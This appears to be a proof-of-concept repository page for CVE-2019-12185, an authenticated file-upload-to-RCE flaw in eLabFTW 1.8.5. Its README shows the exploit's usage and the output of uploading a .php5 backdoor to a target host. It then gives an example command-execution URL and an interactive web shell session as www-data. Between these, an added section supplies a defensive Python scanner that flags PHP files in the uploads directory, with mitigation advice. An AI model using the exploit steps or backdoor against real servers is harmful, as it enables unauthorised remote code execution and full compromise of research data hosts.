
CVE-2019-12185 PoC: eLabFTW command/code injection vulnerability

Source
Associated Vulnerability
Title: eLabFTW command/code injection vulnerability (CVE-2019-12185)
Description: eLabFTW is an open-source platform for hosting experimental data. It runs on Linux and supports storing many kinds of objects. eLabFTW 1.8.5 contains a command/code injection vulnerability: when an executable command is built from externally supplied input, the system or product fails to correctly filter special elements in that input. An attacker can exploit this to execute unauthorized commands.
Description
CVE-2019-12185 - eLabFTW 1.8.5 Python3 Exploit POC
Readme
# CVE-2019-12185
eLabFTW 1.8.5 is vulnerable to arbitrary file uploads via the /app/controllers/EntityController.php component. This may result in remote command execution. An attacker can use a user account to fully compromise the system using a POST request. This will allow for PHP files to be written to the web root, and for code to execute on the remote server. --> https://nvd.nist.gov/vuln/detail/CVE-2019-12185

# Example Usage
## Arguments
```
$ python3 CVE-2019-12185.py --help
usage: CVE-2019-12185.py [-h] [--shell SHELL] [-e EMAIL] [-P PASSWORD] [-u URL] [--port PORT] [--no-verify] [--silence-warnings]

eLabFTW 1.8.5 arbitrary file upload / RCE (Python3). Either use --shell to start a non-interactive shell, or provide login args to upload a new one.

options:
  -h, --help            show this help message and exit
  --shell SHELL         Full URL to existing .php5 backdoor in /uploads (e.g., https://host/uploads/..../abc.php5)
  -e, --email EMAIL     Login email
  -P, --password PASSWORD
                        Login password
  -u, --url URL         Base URL (e.g., https://192.168.1.10)
  --port PORT           Port override (defaults to 443 for https, 80 for http)
  --no-verify           Disable TLS certificate verification
  --silence-warnings    Silence urllib3 InsecureRequestWarning (effective only with --no-verify)
```
## Uploading the Reverse Shell
```
$ python3 CVE-2019-12185.py -e adm@source.pg -P password -u https://192.168.116.235 --no-verify --silence-warnings
[INFO] Disabled warnings about insecure https certifications.
[INFO] Loaded URL: 'https://192.168.116.235'
[INFO] Attempting to grab a form token from elabftw...
[INFO] Attempting to login with the provided credentials and form token...
[INFO] Succesfully sent payload to target!
[INFO] Check for a shell: https://192.168.116.235/uploads/
[INFO] Example RCE: https://192.168.116.235/uploads/82/82b757007585fa963c82b09.php5?e=whoami
```
## Finding the Backdoor
The backdoor can be found in the elabftw uploads directory.
<img width="747" height="408" alt="image" src="https://github.com/user-attachments/assets/4012a1b3-ac00-422d-92f6-f641bc12bf78" />
<img width="1857" height="374" alt="image" src="https://github.com/user-attachments/assets/5d342044-327f-4b04-ac8a-658621334370" />
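The README shows the dropped file as `uploads/<2-char prefix>/<long hex name>.php5`. A defender checking an eLabFTW host for this post-exploitation artifact wants a scan of the uploads tree that flags both PHP-executable extensions and PHP content hiding behind a harmless-looking extension. The following is an added example written for this page, not code from the PoC repository or from the eLabFTW project; the directory layout, the `PHP_EXTENSIONS` set and the sample files it creates are constructed assumptions.

```python
"""Scan an eLabFTW-style uploads directory for files the web server could execute.

Added defensive example (not part of the PoC repository or of eLabFTW). It
assumes the layout the README shows: uploads/<2-char prefix>/<hex name>.<ext>.
"""
import os
import tempfile
from dataclasses import dataclass

# Extensions commonly mapped to the PHP interpreter; .php5 is the one the
# README shows being dropped. Any of them under an upload tree is a finding.
# This set is an assumption; extend it to match your web server's handler map.
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}


@dataclass
class Finding:
    path: str
    reason: str


def looks_like_php(data: bytes) -> bool:
    """True if the leading bytes contain a PHP open tag (extension-agnostic)."""
    head = data[:4096].lower()
    return b"<?php" in head or b"<?=" in head


def scan_uploads(root: str) -> list[Finding]:
    """Walk the uploads tree and report files that could run as PHP."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if ext in PHP_EXTENSIONS:
                findings.append(Finding(full, f"executable extension {ext}"))
                continue
            try:
                with open(full, "rb") as fh:
                    if looks_like_php(fh.read(4096)):
                        findings.append(Finding(full, "PHP open tag in content"))
            except OSError:
                # Unreadable file: skip rather than abort the whole scan.
                pass
    return sorted(findings, key=lambda f: f.path)


def build_sample_uploads() -> str:
    """Create a constructed sample tree mirroring the README's layout."""
    root = tempfile.mkdtemp(prefix="elabftw_uploads_")
    sub = os.path.join(root, "4c")
    os.makedirs(sub)
    # Benign attachment a user would legitimately upload (constructed).
    with open(os.path.join(sub, "a1b2c3.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4 constructed sample\n")
    # Same shape as the file in the README: hex name with a .php5 extension
    # (constructed placeholder content, not a web shell).
    with open(os.path.join(sub, "4cc58d21" + "0" * 24 + ".php5"), "wb") as fh:
        fh.write(b"<?php echo 'constructed placeholder'; ?>\n")
    # PHP content behind a harmless-looking extension (constructed).
    with open(os.path.join(sub, "notes.txt"), "wb") as fh:
        fh.write(b"<?php echo 'constructed placeholder'; ?>\n")
    return root


if __name__ == "__main__":
    for f in scan_uploads(build_sample_uploads()):
        print(f"{f.reason}: {f.path}")
```

Run it against the real uploads directory instead of `build_sample_uploads()` to check a host. The scan finds artifacts after the fact; the durable fix is to stop the upload directory from being served as executable at all (deny script handlers for `/uploads` in the web server configuration) and to upgrade past 1.8.5.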

## Getting a Shell
```
$ python3 CVE-2019-12185.py --shell "https://192.168.116.235/uploads/4c/4cc58d211b453aa9b21b00b77284295de18300693f5755ea1f41b331a2d04384b9524bc87179601e55fdf5279dc945681ea1948ed6ac30c6ef4899db8c3a051a.php5" --no-verify --silence-warnings
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -las
total 12
4 drwxr-xr-x 2 www-data www-data 4096 Aug 16 23:14 .
4 drwxr-xr-x 4 www-data www-data 4096 Aug 16 23:14 ..
4 -rw------- 1 www-data www-data   45 Aug 16 23:14 4cc58d211b453aa9b21b00b77284295de18300693f5755ea1f41b331a2d04384b9524bc87179601e55fdf5279dc945681ea1948ed6ac30c6ef4899db8c3a051a.php5
$ 
```

File Snapshot

```
[4.0K] /data/pocs/fc9d61455890ee744dcbe01bd53021bea785d9a6
├── [ 12K] CVE-2019-12185.py
└── [3.0K] README.md

0 directories, 2 files
```